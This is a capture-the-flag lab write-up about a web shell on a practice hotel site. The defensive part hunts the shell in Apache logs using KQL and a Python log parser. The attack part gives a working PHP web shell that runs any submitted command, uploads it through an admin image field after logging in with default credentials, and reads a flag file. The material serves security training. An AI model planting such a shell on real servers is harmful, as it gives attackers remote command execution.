Day 3: Even if I wanted to go, their vulnerabilities wouldn't allow it.

Note:
Hey! Before you go through this writeup, try the task by yourself first; if you get stuck, come back and check out the writeup.
We have been given access to a SIEM and, according to the story, we are dealing with Apache web logs and need to track down a web shell.
A web shell is a malicious script uploaded to a web server, providing attackers with remote access and control over the compromised system. Often written in languages like PHP, ASP, or Python, web shells allow attackers to execute commands, manipulate files, or escalate privileges. They are commonly used for persistence in targeted attacks, making detection and removal critical. Monitoring for unusual web server behaviour and implementing strong input validation are key defences against web shell exploitation.
Launch the AttackBox and head over to its IP.
Using the left-hand menu, visit the “Discovery” page.
Change the collection to the “frostypines-resorts” data collection.
Set a time filter for between “11:30 and 12:00 on October 3rd 2024”.
Q: BLUE: Where was the web shell uploaded to?
A: The raw Apache logs are stored in a field called "message", which includes upload directories and file names. We can filter for the string "shell.php" to find where the web shell was uploaded. To run the shell, it needs to be accessed, usually with a GET request. Since the request includes the file path, filtering the logs for it pinpoints where "shell.php" was uploaded on the file system.
We can use the following KQL to search for the string "shell.php" in the message field:
message : "shell.php"
Q: BLUE: What IP address accessed the web shell?
A: With the same message filter as before, let's filter for the "client IP" field.
There are two IPs, and one has far more events than the other. Let's filter for that IP.
This is the answer for the question.
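As an added example (not part of the original writeup or the challenge), the same hunt done outside Kibana: a small Python script that parses Apache combined-format log lines, keeps only the requests for shell.php, pulls out the command query parameter, and reports the upload directory and the most active client IP. The log lines, IPs and paths below are constructed for the example and are not the challenge's data.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format; IPs and paths are made up
# for this example and are not taken from the challenge's data set.
SAMPLE_LOGS = """\
10.0.0.5 - - [03/Oct/2024:11:41:02 +0000] "GET /rooms HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Oct/2024:11:42:10 +0000] "POST /admin/add-room HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.13.27.98 - - [03/Oct/2024:11:43:55 +0000] "GET /uploads/rooms/shell.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
10.13.27.98 - - [03/Oct/2024:11:44:20 +0000] "GET /uploads/rooms/shell.php?command=whoami HTTP/1.1" 200 45 "-" "Mozilla/5.0"
10.13.27.98 - - [03/Oct/2024:11:44:51 +0000] "GET /uploads/rooms/shell.php?command=ls HTTP/1.1" 200 210 "-" "Mozilla/5.0"
10.0.0.7 - - [03/Oct/2024:11:45:00 +0000] "GET /uploads/rooms/shell.php HTTP/1.1" 200 87 "-" "curl/8.0"
"""

# Combined log format: client IP, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_web_shell_hits(log_text, filename="shell.php"):
    """Return one record per request whose path ends with the web shell's file name,
    the equivalent of the Kibana search `message : "shell.php"`, plus any command it ran."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # ignore lines that are not in the expected format
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/" + filename):
            continue
        command = parse_qs(parts.query).get("command", [None])[0]
        hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                     "path": parts.path, "command": command})
    return hits


def summarize(hits):
    """Answer the two BLUE questions: upload directory and most active client IP."""
    dirs = sorted({h["path"].rsplit("/", 1)[0] + "/" for h in hits})
    ips = Counter(h["ip"] for h in hits)
    top_ip = ips.most_common(1)[0][0] if ips else None
    return dirs, ips, top_ip


if __name__ == "__main__":
    dirs, ips, top_ip = summarize(find_web_shell_hits(SAMPLE_LOGS))
    print("upload dir:", dirs, "| per-IP hits:", dict(ips), "| top IP:", top_ip)
```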
Q: RED: What is the contents of the flag.txt?
A: To get the flag we need to replicate the web shell attack to gain access to the web server.
To visit the website we need to add the IP to our hosts file so that when we visit frostypines.thm the browser is directed to the webpage. How to do this depends on your platform; here is a guide on how to do this on Windows, Mac and Linux.
Once you're on the website, log in as an admin using one of the default credentials listed in the story.
We'll use the "admin@frostypines.thm" username and "admin" password to log in as an admin.
Once we are logged in, open the account drop-down and visit the Admin console.
We need a web shell to execute on this web site.
The challenge author has provided us with a sample web shell.
<html>
<body>
  <!-- the form submits the typed command back to this same script as ?command=... -->
  <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input type="text" name="command" autofocus id="command" size="50">
    <input type="submit" value="Execute">
  </form>
  <pre>
<?php
// run the submitted command on the server; "2>&1" merges stderr into the output shown on the page
if(isset($_GET['command']))
{
    system($_GET['command'] . ' 2>&1');
}
?>
  </pre>
</body>
</html>
Save this into a file called "shell.php". You can name it whatever you want, but make sure that it ends with ".php".
In the admin console click on "Add new Room" and, for the picture, upload the web shell.
NOTE: Depending on your browser you might have to drag and drop the file onto the "Browse…" button.
Click on “Add Room”.
You will be redirected back to the “Rooms” page, and the newly created room will be shown.
Right-click on its image and open it in a new tab.
In the new tab the web shell should open.
You can run the following command to get the flag.
cat flag.txt
Q: If you liked today's task, you can learn how to harness the power of advanced ELK queries.
A: No Answer needed!